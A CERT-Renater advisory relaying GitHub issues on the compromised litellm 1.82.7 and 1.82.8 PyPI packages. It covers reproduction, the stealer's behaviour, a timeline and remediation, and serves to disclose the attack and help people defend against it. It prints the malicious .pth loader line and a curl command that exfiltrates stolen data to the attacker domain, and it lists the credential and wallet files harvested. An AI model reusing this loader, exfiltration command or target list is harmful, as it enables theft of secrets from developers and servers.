Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2026/VULN337
_____________________________________________________________________

DATE                : 27/03/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running litellm versions 1.82.7, 1.82.8.

=====================================================================
https://github.com/BerriAI/litellm/issues/24512
https://github.com/BerriAI/litellm/issues/24518
_____________________________________________________________________

Description
isfinne
opened on Mar 24, 2026

[LITELLM TEAM] - For updates
 from the team, please see: #24518

[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 PyPI
package — credential stealer
Summary

The litellm==1.82.8 wheel package on PyPI contains a malicious .pth
file (litellm_init.pth, 34,628 bytes) that automatically executes a
credential-stealing script every time the Python interpreter starts — no
import litellm required.

This is a supply chain compromise. The malicious file is listed in the
package's own RECORD:

litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628


Reproduction

pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])
"


You will see litellm_init.pth containing:

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])


Malicious Behavior (full analysis)

The payload is double base64-encoded. When decoded, it performs the
following:


Stage 1: Information Collection

The script collects sensitive data from the host system:

    System info: hostname, whoami, uname -a, ip addr, ip route
    Environment variables: printenv (captures all API keys, secrets, tokens)
    SSH keys: ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.ssh/id_ecdsa, ~/.ssh/id_dsa, ~/.ssh/authorized_keys, ~/.ssh/known_hosts, ~/.ssh/config
    Git credentials: ~/.gitconfig, ~/.git-credentials
    AWS credentials: ~/.aws/credentials, ~/.aws/config, IMDS token + security credentials
    Kubernetes secrets: ~/.kube/config, /etc/kubernetes/admin.conf, /etc/kubernetes/kubelet.conf, /etc/kubernetes/controller-manager.conf, /etc/kubernetes/scheduler.conf, service account tokens
    GCP credentials: ~/.config/gcloud/application_default_credentials.json
    Azure credentials: ~/.azure/
    Docker configs: ~/.docker/config.json, /kaniko/.docker/config.json, /root/.docker/config.json
    Package manager configs: ~/.npmrc, ~/.vault-token, ~/.netrc, ~/.lftprc, ~/.msmtprc, ~/.my.cnf, ~/.pgpass, ~/.mongorc.js
    Shell history: ~/.bash_history, ~/.zsh_history, ~/.sh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history
    Crypto wallets: ~/.bitcoin/, ~/.litecoin/, ~/.dogecoin/, ~/.zcash/, ~/.dashcore/, ~/.ripple/, ~/.bitmonero/, ~/.ethereum/keystore/, ~/.cardano/, ~/.config/solana/
    SSL/TLS private keys: /etc/ssl/private/, Let's Encrypt .pem and .key files
    CI/CD secrets: terraform.tfvars, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, Anchor.toml, ansible.cfg
    Database credentials: PostgreSQL, MySQL, Redis, LDAP config files
    Webhook URLs: grep for Slack/Discord webhook URLs in env and config files


Stage 2: Encryption & Exfiltration

    Collected data is written to a temporary file
    A random 32-byte AES-256 session key is generated via openssl rand
    The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
    The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
    Both encrypted files are packed into tpcp.tar.gz
    The archive is exfiltrated via:

curl -s -o /dev/null -X POST \
  "https://models.litellm.cloud/" \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz


Key Technical Details

    Trigger mechanism: .pth files in site-packages/ are executed
automatically by the Python interpreter on startup (see Python docs
on .pth files). No import statement is needed.
    Stealth: The payload is double base64-encoded, making it invisible
to naive source code grep.
    Exfiltration target: https://models.litellm.cloud/ — note the domain
litellm.cloud (NOT litellm.ai, the official domain).
    RSA public key (first 64 chars):
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...


Impact

Anyone who installed litellm==1.82.8 via pip has had all environment
variables, SSH keys, cloud credentials, and other secrets collected
and sent to an attacker-controlled server.

This affects:

    Local development machines
    CI/CD pipelines
    Docker containers
    Production servers


Affected Version

    Confirmed: litellm==1.82.8 (PyPI wheel litellm-1.82.8-py3-none-any.whl)
    Other versions: Not yet checked — the attacker may have compromised
multiple releases


Recommended Actions

    PyPI: Yank/remove litellm 1.82.8 immediately
    Users: Check for litellm_init.pth in your site-packages/ directory
    Users: Rotate ALL credentials that were present as environment variables
or in config files on any system where litellm 1.82.8 was installed
    BerriAI: Audit PyPI publishing credentials and CI/CD pipeline for compromise


Environment

    OS: Ubuntu 24.04 (Docker container)
    Python: 3.13
    pip installed from PyPI
    Discovered: 2026-03-24

_____________________________________________________________________

[Security]: litellm PyPI package (v1.82.7 + v1.82.8) compromised —
full timeline and status #24518

Description
isfinne  opened on Mar 24, 2026

[LITELLM TEAM UPDATES]

    Compromised packages have been deleted (v1.82.7, v1.82.8)
    Compromise came from trivvy security scan dependency
    All maintainer accounts have been rotated (new maintainer accounts:
@krrish-berri-2 , @ishaan-berri)
    Proxy Docker image users were not impacted, all dependencies are
pinned on requirements.txt
    No litellm releases will be out until we have scanned our chain
and make sure it's safe


Next Steps

    Review all berriai repo's for impact
    Scan circle ci builds to understand blast radius, and mitigate it
    We've engaged Google's mandiant.security team, and are actively
working on this with them

We are actively investigating this issue. Please reach out to us on
support@berri.ai, if you have any questions / concerns.


Summary

The litellm PyPI package was compromised by an attacker who gained access
to the maintainer's PyPI account. Malicious versions were published that
steal credentials and exfiltrate them to an attacker-controlled server.

Original detailed analysis: #24512

Hacker News discussion: https://news.ycombinator.com/item?id=47501729
What happened

    The maintainer's PyPI account (krrishdholakia) appears to have been
hijacked by an attacker (teampcp)
    The attacker published malicious versions to PyPI that were never
released through the official GitHub CI/CD
    GitHub releases only go up to v1.82.6.dev1 — versions 1.82.7 and
1.82.8 on PyPI were uploaded directly by the attacker


Affected versions

Version 	Method 	Trigger

1.82.7 	Payload embedded in litellm/proxy/proxy_server.py 	Triggered
on import litellm.proxy

1.82.8 	Added litellm_init.pth (34,628 bytes) + payload in proxy_server.py
 	Any Python startup — no import needed

Other versions may also be affected and should be audited.


What the malicious code does

    Collects: SSH keys, environment variables (API keys, secrets),
AWS/GCP/Azure/K8s credentials, crypto wallets, database passwords, SSL
private keys, shell history, CI/CD configs

    Encrypts: AES-256-CBC + RSA-4096 (hardcoded public key)
    Exfiltrates: curl POST to https://models.litellm.cloud/

The exfiltration domain litellm.cloud (NOT the official litellm.ai) was
registered on 2026-03-23 via Spaceship, Inc. — just hours before the
malicious packages appeared.


Current status

    PyPI: The entire litellm package has been suspended/removed. All
versions currently return "No matching distribution found." We reported
the malware to PyPI via the official "Report malware" form.


    GitHub Issue 

    [Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 —
credential stealer #24512: Contains the original detailed technical
analysis (currently closed by the attacker's spam — see below).

    Attacker behavior: The attacker appears to be publishing hundreds of
spam comments to suppress discussion. If this continues, we recommend
moderating via the Hacker News thread linked above.


Recommendations for affected users

    Check if litellm_init.pth exists in your site-packages/ directory
    Rotate ALL credentials that were present as environment variables or
config files on any system where litellm 1.82.7+ was installed
    Pin dependencies to exact versions and verify against GitHub releases
    Monitor for unauthorized access using any potentially leaked credentials


References

    Original analysis: 

[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 —
credential stealer #24512

Hacker News: https://news.ycombinator.com/item?id=47501729
Attacker's exfil domain WHOIS: registered 2026-03-23, Spaceship Inc.,
privacy-protected

litellm_init.pth SHA256: ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg

=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================